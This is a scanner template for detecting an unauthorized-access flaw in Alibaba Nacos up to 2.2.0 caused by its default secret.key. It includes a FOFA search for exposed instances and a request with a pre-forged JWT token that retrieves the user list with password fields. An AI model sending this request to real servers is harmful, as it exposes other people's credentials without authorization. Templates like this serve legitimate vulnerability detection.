漏洞描述
Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞
Alibaba Nacos <= 2.2.0
fofa: app="NACOS"
id: nacos-secret-default-key-unauth
info:
name: Alibaba Nacos secret.key默认密钥 未授权访问漏洞
author: zan8in
severity: high
verified: true
description: |-
Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞
Alibaba Nacos <= 2.2.0
fofa: app="NACOS"
tags: nacos,unauth
created: 2024/07/20
rules:
r0:
request:
method: GET
path: /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9
expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"username":') && response.body.bcontains(b'"password":')
expression: r0()